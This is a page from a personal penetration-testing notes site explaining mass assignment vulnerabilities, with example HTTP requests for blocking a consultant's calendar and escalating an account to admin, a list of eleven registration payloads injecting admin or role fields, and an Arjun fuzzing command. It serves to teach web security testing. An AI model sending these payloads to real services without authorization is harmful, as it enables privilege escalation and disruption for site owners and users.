Security Notes
  • Whoami
  • Pentesting
    • WEP-Pen
      • Reconnaissance
      • Enumeration
      • OWSAP TOP 10
        • Injection
          • Cross Site Scripting
            • Cross Site Scripting
            • Exploitation
            • Protections
          • SQL Injection
            • SQL Injection Overview
          • NoSQL Injection
          • CRLF Injection
          • XML Injection
        • Broken Access Control
          • Path Traversal
          • Sensitive Cookie with Improper SameSite Attribute
          • Link Following
          • Incorrect Default Permissions
          • Information disclosure
          • CSRF
            • csrf checklist
          • 403 bypass
          • Exposure of WSDL File Containing Sensitive Information
          • bussiness logic checklist
          • 2FA bypass checklist
          • admin panal checklist
          • idor checklist
          • Authentication checklist
          • reset_password_checklist
          • ATO
        • Cryptographic Failures
          • Cryptographic Failure
          • Weak Encoding for Password
          • Improper Following of a Certificate's Chain of Trust
            • Understanding Digital Certificates : Self-Signed and CA-Signed Certificate **
            • Transport Layer Security (TLS) and SSL **
          • Clear Text Transmission Of Sensitive Data
            • SSLStripping **
        • Insecure Design
        • Security Misconfiguration
          • CORS Miscofigration
          • Mail Server Misconfiguration
        • Vulnerable and Outdated Components
          • Using Components with Known Vulnerabilities
        • Identification and Authentication Failures
          • JWT Hacking
          • SAML Authentication bypass
        • Software and Data Integrity Failures
          • mass assignment
          • PostMessage Vulnerabilities
            • PostMessage Vulnerabilities
            • Blocking main page to steal postmessage
            • Bypassing SOP with Iframes - part 1
            • Bypassing SOP with Iframes - part 2
            • Steal postmessage modifying iframe location
        • Security Logging and Monitoring Failures
        • Server-Side Request Forgery (SSRF)
          • SSRF
      • Checklists
        • aem misconfiguration
        • exif_geo
        • xss
        • Session Management
        • Authorization
        • cookie
        • Django
        • Symfony
        • json
        • bypass rate limit
        • Rce
        • Register Page
      • eWPTXv2 Preparation
        • Encoding & Filtering
        • Evasion Basics
        • Cross-site scripting (XSS)
        • XSS Filter Evasion
        • Cross-site request forgery (CSRF
        • HTML5
      • API-Pen
        • API Discovry
        • Reverse Engineering API Documentation
        • Excessive Data Exposure
        • Vulnerability Scanning
        • API Authentication Attacks
          • Classic Authentication Attacks
          • API Token Attacks
        • API Authorization Attacks
          • Broken Object Level Authorization (BOLA)
          • Broken Function Level Authorization
        • Improper Assets Management
        • Mass Assignment
        • SSRF
        • Injection Attacks in API
        • Evasive Maneuvers
        • GraphQL Vulnerabilities
    • NET-Pen
      • Active Directory Pentesting
        • Active Directory Components
        • Initial Attack Vectors
          • LLMNR Poisoning
          • SMB Relay Attacks
          • IPv6 Attacks ( IPv6 DNS Takeover )
          • Printer Hacking
          • Methodology
          • Some Other Attacks
            • Zerologon (CVE-2020-1472)
            • PrintNightmare (CVE-2021-1675)
        • Post-Compromise Attacks
          • Pass Attacks
          • Kerberoasting Attack
          • Token Impersonation Attack
          • LNK File Attack
          • GPP / cPassword Attacks
          • Mimikatz
          • Methodology
        • We've Compromised the Domain
          • Dumping the NTDS.dit
          • Golden Ticket Attacks
          • Methodology
        • Case Study
        • Password Attacks
      • Attack Vectors by Port
        • FTP 21
        • SSH 22
        • Telnet 23 - 2323
        • SMTP 25
        • DNS 53
        • Kerberos 88
        • POP 110-995
        • RPC 111
        • Ident 113
        • NNTP 119
        • NetBIOS 137-138
        • SMB / Samba 135-139, 445
        • MSRPC 135
        • SNMP 161
        • LDAP 389,636
        • Modbus 502
        • OpenSSL 1337
        • Ms-SQL 1433
        • Oracle Listener 1521 1522 1529
        • NFS 2049
        • MySql 3306
        • RDP 3389
        • ADB Android Debug Bridge 5555
        • WinRM 5985 5986
        • VNC 5800 5900
        • Redis 6379
        • Unreal IRC 6667
        • Tomcat 8080
        • MongoDB 27017
        • http 80
      • Network basics
      • Information Gathering
      • Privilege Escalation
        • Windows Privilege Escalation
        • Linux Privilege Escalation
    • write-ups
      • How i found a Privilege Escalation via Impersonation Features feature
      • How I was able to discover ATO Via IDOR vulnerability
      • Easy full Account Takeover via Facebook OAuth Misconfiguration
Powered by GitBook
On this page
  1. Pentesting
  2. WEP-Pen
  3. OWSAP TOP 10
  4. Software and Data Integrity Failures

mass assignment

Mass Assignment is a security vulnerability that arises when an application automatically assigns user input values to an object's properties without properly controlling which attributes are accessible for modification. This can result in unauthorized or unintended changes to sensitive data, such as modifying attributes that should only be editable by an administrator or specific users.

How it works:

  • An application typically uses an object to represent entities (e.g., a user, product, or account) with various attributes (e.g., user.email, product.stock, account.wallet).

  • When a user submits a request (usually a PUT or PATCH request), the application might directly map the user-supplied data to the object's properties.

  • If the application does not validate or restrict which attributes can be modified, the user could potentially modify properties they shouldn't have access to (e.g., product.title, account.wallet, account.type).

Scenario 1: Booking an Appointment for a Consultant

An application allows users to book appointments for a consultant by selecting available time slots.

Request Example (Normal Booking):

POST /book HTTP/1.1
Host: domain.com
Content-Type: application/json

{
    "startDate": "29/04/2022 11:00",
    "endDate": "29/04/2022 12:00",
    "userID": "123",
    "consultantID": "123"
}

An attacker realizes they can modify the endDate to extend the appointment for years, thereby blocking future slots.

Request Example (Malicious Modification):

POST /book HTTP/1.1
Host: your-domain.com
Content-Type: application/json

{
    "startDate": "29/04/2022 11:00",
    "endDate": "29/04/2099 12:00",  // Extended to an unreasonable future date
    "userID": "123",
    "consultantID": "123"
}

By exploiting this, the attacker could fully block the consultant’s calendar for years. This is a subtle vulnerability, often overlooked because the system doesn’t properly validate the date range or check for unrealistic future times.

Scenario 2: Changing User Account Type

An attacker may gain unauthorized access to higher privileges by manipulating account-related parameters. In this case, the attacker finds that the AccountType property is reflected in the response but is not protected in the API.

Request Example (Normal Profile Update):

POST /profile/update HTTP/1.1
Host: domain.com
Content-Type: application/json

{
    "endDate": "29/04/2099 12:00",
    "userID": "123",
    "consultantID": "123"
}

Response:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: <content-length>

{
    "AccountType": "user",   // Account type is returned in the response
    "endDate": "29/04/2099 12:00",
    "userID": "123",
    "consultantID": "123"
}

Exploit: Modifying Account Type

the attacker sends a request including the AccountType field.

Request Example (Malicious Modification):

POST /profile/update HTTP/1.1
Host: domain.com
Content-Type: application/json

{
    "endDate": "29/04/2099 12:00",
    "userID": "123",
    "consultantID": "123",
    "AccountType": "admin"   // Attacker adds this field
}

Response:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: <content-length>

{
    "AccountType": "admin",  // Account type has been changed to admin
    "endDate": "29/04/2099 12:00",
    "userID": "123",
    "consultantID": "123"
}

As a result, the attacker successfully changes their account type to admin without any validation, potentially gaining higher privileges such as administrative access.

Mass Assignment Testing Steps

Target Vulnerabilities:

  • Account Registration

  • Unauthorized Access to Organizations

  • Reset Password

  • Login

  • Change Email

  • Change Username

Account Registration Request:

  • Basic Request:

    POST /api/v1/register
--snip--
{
  "username": "hAPI_hacker",
  "email": "hapi@hacker.com",
  "password": "Password1!"
}

Mass Assignment Variations:

  1. Try with admin key:

    POST /api/v1/register
--snip--
{
  "username": "hAPI_hacker",
  "email": "hapi@hacker.com",
  "admin": true,
  "password": "Password1!"
}

  2. Try with ADMIN key:

    POST /api/v1/register
--snip--
{
  "username": "hAPI_hacker",
  "email": "hapi@hacker.com",
  "ADMIN": true,
  "password": "Password1!"
}

  3. Try with isadmin key:

    POST /api/v1/register
--snip--
{
  "username": "hAPI_hacker",
  "email": "hapi@hacker.com",
  "isadmin": true,
  "password": "Password1!"
}

  4. Try with ISADMIN key:

    POST /api/v1/register
--snip--
{
  "username": "hAPI_hacker",
  "email": "hapi@hacker.com",
  "ISADMIN": true,
  "password": "Password1!"
}

  5. Try with Admin key:

    POST /api/v1/register
--snip--
{
  "username": "hAPI_hacker",
  "email": "hapi@hacker.com",
  "Admin": true,
  "password": "Password1!"
}

  6. Try with role set to admin:

    POST /api/v1/register
--snip--
{
  "username": "hAPI_hacker",
  "email": "hapi@hacker.com",
  "role": "admin",
  "password": "Password1!"
}

  7. Try with role set to ADMIN:

    POST /api/v1/register
--snip--
{
  "username": "hAPI_hacker",
  "email": "hapi@hacker.com",
  "role": "ADMIN",
  "password": "Password1!"
}

  8. Try with role set to administrator:

    POST /api/v1/register
--snip--
{
  "username": "hAPI_hacker",
  "email": "hapi@hacker.com",
  "role": "administrator",
  "password": "Password1!"
}

  9. Try with user_priv set to administrator:

    POST /api/v1/register
--snip--
{
  "username": "hAPI_hacker",
  "email": "hapi@hacker.com",
  "user_priv": "administrator",
  "password": "Password1!"
}

  10. Try with user_priv set to admin:

    POST /api/v1/register
--snip--
{
  "username": "hAPI_hacker",
  "email": "hapi@hacker.com",
  "user_priv": "admin",
  "password": "Password1!"
}

  11. Try with admin as integer:

    POST /api/v1/register
--snip--
{
  "username": "hAPI_hacker",
  "email": "hapi@hacker.com",
  "admin": 1,
  "password": "Password1!"
}

Unauthorized Access to Organizations:

  • Register with Organization:

    POST /api/v1/register
--snip--
{
  "username": "hAPI_hacker",
  "email": "hapi@hacker.com",
  "org": "§CompanyA§",
  "password": "Password1!"
}

Finding Variables in Documentation:

  • Read documentation to find variables, Some Tips here.

Fuzzing Unknown Variables:

  • Perform actions in the web application, intercept requests, and locate additional headers or parameters.

    POST /create/user
--snip--
{
  "username": "hapi_hacker",
  "pass": "ff7ftw",
  "uam": 1,
  "mfa": true,
  "account": 101
}

Automating Mass Assignment Attacks:

  • Use Arjun and Burp Suite Intruder:

    arjun --headers "Content-Type: application/json" -u http://vulnhost.com/api/register -m JSON --include='{$arjun$}'

PreviousSoftware and Data Integrity FailuresNextPostMessage Vulnerabilities

Last updated 2 months ago